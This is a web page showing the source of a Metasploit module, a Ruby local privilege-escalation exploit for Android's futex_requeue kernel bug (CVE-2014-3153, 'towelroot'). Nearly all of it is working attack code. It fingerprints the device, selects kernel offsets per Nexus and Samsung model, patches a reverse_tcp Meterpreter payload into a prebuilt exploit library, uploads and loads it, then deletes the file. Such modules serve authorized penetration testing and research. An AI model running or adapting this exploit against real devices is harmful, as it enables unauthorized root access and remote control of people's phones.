CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/android/local/futex_requeue.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Common

11
  prepend Msf::Exploit::Remote::AutoCheck

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        {

18
          'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",

19
          'Description' => %q{

20
            This module exploits a bug in futex_requeue in the Linux kernel, using

21
            similar techniques employed by the towelroot exploit. Any Android device

22
            with a kernel built before June 2014 is likely to be vulnerable.

23
          },

24
          'License' => MSF_LICENSE,

25
          'Author' => [

26
            'Pinkie Pie', # discovery

27
            'geohot',     # towelroot

28
            'timwr'       # metasploit module

29
          ],

30
          'References' => [

31
            [ 'CVE', '2014-3153' ],

32
            [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],

33
            [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],

34
          ],

35
          'DisclosureDate' => '2014-05-03',

36
          'SessionTypes' => [ 'meterpreter' ],

37
          'Platform' => [ "android", "linux" ],

38
          'Payload' => { 'Space' => 2048, },

39
          'DefaultOptions' => {

40
            'WfsDelay' => 300,

41
            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',

42
          },

43
          'Notes' => {

44
            'Stability' => [CRASH_SAFE],

45
            'SideEffects' => [],

46
            'Reliability' => [],

47
            'AKA' => ['towelroot'] },

48
          'DefaultTarget' => 0,

49
          'Targets' => [

50
            # Automatic targetting via getprop ro.build.model

51
            ['Automatic Targeting', { 'auto' => true }],

52


53
            # This is the default setting, Nexus 4, 5, 7, etc

54
            [

55
              'Default',

56
              {

57
                'new_samsung' => false,

58
                'iovstack' => 2,

59
                'offset' => 0,

60
                'force_remove' => false,

61
              }

62
            ],

63


64
            # Samsung devices, S3, S4, S5, etc

65
            [

66
              'New Samsung',

67
              {

68
                'new_samsung' => true,

69
                'iovstack' => 2,

70
                'offset' => 7380,

71
                'force_remove' => true,

72
              }

73
            ],

74


75
            # Older Samsung devices, e.g the Note 2

76
            [

77
              'Old Samsung',

78
              {

79
                'new_samsung' => false,

80
                'iovstack' => 1,

81
                'offset' => 0,

82
                'force_remove' => true,

83
              }

84
            ],

85


86
            # Samsung Galaxy Grand, etc

87
            [

88
              'Samsung Grand',

89
              {

90
                'new_samsung' => false,

91
                'iovstack' => 5,

92
                'offset' => 0,

93
                'force_remove' => true,

94
              }

95
            ],

96
          ],

97
          'Compat' => {

98
            'Meterpreter' => {

99
              'Commands' => %w[

100
                core_loadlib

101
                stdapi_fs_delete_file

102
                stdapi_fs_getwd

103
              ]

104
            }

105
          },

106
        }

107
      )

108
    )

109
  end

110


111
  def check

112
    os = cmd_exec("getprop ro.build.version.release")

113
    unless Rex::Version.new(os) < Rex::Version.new('4.5.0')

114
      vprint_error "Android version #{os} does not appear to be vulnerable"

115
      return CheckCode::Safe

116
    end

117
    vprint_good "Android version #{os} appears to be vulnerable"

118


119
    CheckCode::Appears

120
  end

121


122
  def exploit

123
    if target['auto']

124
      product = cmd_exec("getprop ro.build.product")

125
      fingerprint = cmd_exec("getprop ro.build.fingerprint")

126
      print_status("Found device: #{product}")

127
      print_status("Fingerprint: #{fingerprint}")

128


129
      if [

130
        "mako",

131
        "m7",

132
        "hammerhead",

133
        "grouper",

134
        "Y530-U00",

135
        "G6-U10",

136
        "g2",

137
        "w7n",

138
        "D2303",

139
        "cancro",

140
      ].include? product

141
        my_target = targets[1] # Default

142
      elsif [

143
        "klte", # Samsung Galaxy S5

144
        "jflte", # Samsung Galaxy S4

145
        "d2vzw" # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)

146
      ].include? product

147
        my_target = targets[2] # New Samsung

148
      elsif [

149
        "t03g",

150
        "m0",

151
      ].include? product

152
        my_target = targets[3] # Old Samsung

153
      elsif [

154
        "baffinlite",

155
        "Vodafone_785",

156
      ].include? product

157
        my_target = targets[4] # Samsung Grand

158
      else

159
        print_status("Could not automatically target #{product}")

160
        my_target = targets[1] # Default

161
      end

162
    else

163
      my_target = target

164
    end

165


166
    print_status("Using target: #{my_target.name}")

167


168
    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2014-3153.so")

169
    exploit_data = File.read(local_file, mode: 'rb')

170


171
    # Substitute the exploit shellcode with our own

172
    space = payload_space

173
    payload_encoded = payload.encoded

174
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))

175


176
    # Apply the target config

177
    offsets = my_target.opts

178
    config_buf = [

179
      offsets['new_samsung'] ? -1 : 0,

180
      offsets['iovstack'].to_i,

181
      offsets['offset'].to_i,

182
      offsets['force_remove'] ? -1 : 0,

183
    ].pack('I4')

184
    exploit_data.gsub!("c0nfig" + "\x00" * 10, config_buf)

185


186
    workingdir = session.fs.dir.getwd

187
    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"

188
    write_file(remote_file, exploit_data)

189


190
    print_status("Loading exploit library #{remote_file}")

191
    session.core.load_library(

192
      'LibraryFilePath' => local_file,

193
      'TargetFilePath' => remote_file,

194
      'UploadLibrary' => false,

195
      'Extension' => false,

196
      'SaveToDisk' => false

197
    )

198
    print_status("Loaded library #{remote_file}, deleting")

199
    session.fs.file.rm(remote_file)

200
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")

201
  end

202
end

203


204